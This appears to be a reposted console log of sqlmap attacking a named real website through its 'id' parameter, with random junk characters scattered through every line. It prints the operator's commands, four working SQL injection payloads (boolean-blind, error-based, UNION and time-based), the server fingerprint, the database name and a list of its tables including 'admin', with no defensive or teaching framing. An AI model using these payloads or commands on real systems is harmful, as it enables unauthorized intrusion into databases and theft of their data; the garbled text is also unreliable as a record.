starting at: 16:54:161 Q, s, R* y# t3 Z. Y# b" {# G
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as 8 h$ j: A c$ |2 G2 {6 b session file 8 ?, w# b5 ~# ]6 e[16:54:16] [INFO] resuming injection data from session file. m+ W# N* H0 C4 X* H
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file 8 O" M. k3 h; M' A[16:54:16] [INFO] testing connection to the target url 8 V( o" \0 E/ e* D4 Usqlmap identified the following injection points with a total of 0 HTTP(s) reque - W" N. o) C. N% `7 Msts: 7 Y! n4 @9 P' A x8 `$ I" W1 H---" [/ g2 [4 r0 n" i
Place: GET - U3 O* {0 [* E' k/ iParameter: id2 O9 ^& T, f# E7 M! ]
Type: boolean-based blind / Z$ Q3 v: V W9 o Title: AND boolean-based blind - WHERE or HAVING clause " y; e- c8 h8 r5 h. _( {# \ Payload: id=276 AND 799=799 7 @9 a) ]! h6 }2 o% e Type: error-based+ o/ A9 w7 u; d* H
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause- \( O2 P; b* {
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,7 L' S J3 a) u3 S7 a0 o( `
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58* k) |* F* T6 c6 l
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)1 z2 V7 W' x x. \8 U ~ O" C
Type: UNION query, T2 K+ J( I" m p" H B+ c
Title: MySQL UNION query (NULL) - 1 to 10 columns / q! {0 q- g8 A! Z1 L' {, H e J/ W Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR # Z. b0 h) p8 z* ~8 `. L(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR), $ W9 D( F& ~5 y/ h LCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL# ; A" Z# a6 _" L; m Type: AND/OR time-based blind + K* S% f1 {/ j: R Title: MySQL > 5.0.11 AND time-based blind 7 e; O/ w$ T+ ~2 W! `1 z/ `: y Payload: id=276 AND SLEEP(5) Z" l% F; [5 o8 D* y) V4 D6 G
---% j+ K4 E! p* \' K% K: R2 |6 x: {
[16:54:17] [INFO] the back-end DBMS is MySQL + ^ m. z- G t8 `web server operating system: Windows ; |3 k4 {/ H; I/ \' Rweb application technology: Apache 2.2.11, PHP 5.3.0) }5 G7 \, A9 m- p8 j# h) ^, K
back-end DBMS: MySQL 5.0 6 n& q; x) q' [5 \$ O6 `! Y# C% B[16:54:17] [INFO] fetching current database4 A6 ?' o/ a# s8 o5 S9 w% F- p
current database: 'wepost' # _9 H7 ]8 _. l) ~( v& o; c; I[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou3 I8 u" a* n3 l9 m; m; ~, @
tput\www.wepost.com.hk'
shutting down at: 16:54:18 k$ U! ?) o4 g% T% V; {
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db * q) N' X: |' Ems "Mysql" --tables -D "wepost" /*获取当前数据库的表名. x3 c0 q0 F5 y
sqlmap/0.9 - automatic SQL injection and database takeover tool 9 w w3 }: E0 s3 ~# H# t |$ Chttp://sqlmap.sourceforge.net
starting at: 16:55:25 + s+ G4 ]% k+ L' w[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as6 L7 B# x0 b8 T! M: N: Q
session file& o5 P. I8 R3 G9 H+ I M. k
[16:55:25] [INFO] resuming injection data from session file( f8 q, Y3 }! d6 G' k7 d( l: J
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file$ K" q" j8 Z! y/ X- Y, O6 c
[16:55:25] [INFO] testing connection to the target url+ u Q6 z W i5 j+ G
sqlmap identified the following injection points with a total of 0 HTTP(s) reque / l. q# t6 O; W7 p4 _sts: # p6 ?2 g( u3 N1 \* Z7 y& ~* b, m--- 8 O7 C: h2 A( n! ~; F$ \Place: GET , f! [" ~4 C& h0 S) O' u. `Parameter: id 7 w1 y: c. ~ A3 V: J" \ Type: boolean-based blind @7 C% _$ R4 O; ^
Title: AND boolean-based blind - WHERE or HAVING clause7 o( ]' U6 P5 q% r Q- e: T
Payload: id=276 AND 799=799 . I/ ~4 r* K6 |# {' b( S Type: error-based6 \8 N1 q& F+ k
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause) N4 p. s& |& y6 v8 v8 K0 c
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,/ g! ]; T" _5 M7 [
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58 3 Z5 a% U' i( X6 Z: e),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) & k6 R3 _6 M& o- m4 y I Type: UNION query ) k( Q) G4 Q( U0 ~- n* _ Title: MySQL UNION query (NULL) - 1 to 10 columns * I/ \9 B* G& w- e; h9 m2 X Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR 3 e4 U) A4 C( }$ @/ T" _8 M: |(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR), % I: E" J3 Z4 D" i. oCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL# . e" X4 S6 R& y) n Type: AND/OR time-based blind ' y0 P+ y' m* h0 L; S* |+ H$ `5 Z Title: MySQL > 5.0.11 AND time-based blind . o! p2 H! Z7 Z) k+ h+ F/ I, I Payload: id=276 AND SLEEP(5) * d4 O( \5 B7 `7 z7 S- H5 Z--- + x1 i5 O0 E& Z- _# G1 x1 d[16:55:26] [INFO] the back-end DBMS is MySQL/ U- b7 c0 H; m4 j. V, R, k' O
web server operating system: Windows* d% }. }( S( [. Z) j$ }9 K1 `. o
web application technology: Apache 2.2.11, PHP 5.3.0) Q1 L" X$ }6 n9 Z, c, X
back-end DBMS: MySQL 5.00 \& Q* N4 J+ ^+ ]& z$ V6 Z
[16:55:26] [INFO] fetching tables for database 'wepost' 7 _. b% O& V. y, c/ M+ E8 j7 t0 x[16:55:27] [INFO] the SQL query used returns 6 entries0 M0 Q1 Y" c, W) I, J
Database: wepost 1 F% A9 Z, @/ a! ~[6 tables]4 q7 v3 n! Z/ f5 f. L3 I2 { Z& v
+-------------+ 3 d: K/ Q- N3 [0 @3 W0 i| admin | 8 ]4 N z ^7 c$ `' R2 p3 i* H7 \3 q| article | 2 N8 r. y' K% ]! n5 n| contributor | 5 X" x1 K& [4 H2 w% ~' _| idea |' \% T7 G$ V. o$ o4 ?
| image | x. v6 Y* ~+ r% x| issue |$ `& ?9 t2 {* l. ^. n6 L" m$ ^
+-------------+8 E# u& Y& \' g9 r8 i
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou 0 u( J7 l! s/ P$ ktput\www.wepost.com.hk'